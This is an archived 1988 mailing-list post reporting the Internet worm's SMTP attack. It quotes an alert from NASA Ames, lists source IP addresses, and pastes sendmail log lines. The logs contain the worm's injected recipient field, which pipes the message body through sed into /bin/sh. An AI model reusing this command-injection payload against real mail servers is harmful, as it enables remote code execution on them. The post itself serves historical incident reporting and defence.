Virus posting #2


Steven M. Schultz (sms@ETN-WLV.EATON.COM)
Thu, 3 Nov 88 08:57:19 PST


> From: Peter E. Yee <yee@ames.arc.nasa.gov>
> Message-Id: <8811030728.AA18199@ames.arc.nasa.gov>
> Subject: Internet VIRUS alert
>
> We are currently under attack from an Internet VIRUS. It has hit UC Berkeley,
> UC San Diego, Lawrence Livermore, Stanford, and NASA Ames. The virus comes in
> via SMTP, and then is able to attack all 4.3BSD and SUN (3.X?) machines. It
> sends a RCPT TO that requests that its data be piped through a shell.
> ...
> -Peter Yee
> yee@ames.arc.nasa.gov
> ames!yee

        Before turning off various services I logged attempts from
        these addresses:

                128.15.0.76
                26.7.0.102
                128.49.16.91
                and
                128.9.1.2

        I am still seeing SMTP attempts from 26.7.0.102, the lines in
        the sendmail logfile look like this:

Nov 3 08:26:28 from=</dev/null>, size=1676, class=0
Nov 3 08:26:35 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:19,
Nov 3 08:46:37 from: 26.7.0.102.49412
Nov 3 08:46:57 message-id=<8811031646.AA02609@ETN-WLV.EATON.COM>
Nov 3 08:46:57 from=</dev/null>, size=1677, class=0
Nov 3 08:47:04 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:23,
Nov 3 08:50:46 from: 26.0.0.58.49924
Nov 3 08:51:02 message-id=<8811031650.AA02625@ETN-WLV.EATON.COM>
Nov 3 08:51:02 from=</dev/null>, size=1675,
Nov 3 08:51:08 to=<"| sed '1,/^$/d' | /bin/sh ; exit 0">, delay=00:00:19,

        Hmmm, there'a new one here - 26.0.0.58. Hadn't seen that one yet.

        Steven M. Schultz
        sms@etn-wlv.eaton.com



This archive was generated by hypermail 2.0b3 on Thu Mar 09 2000 - 14:43:58 GMT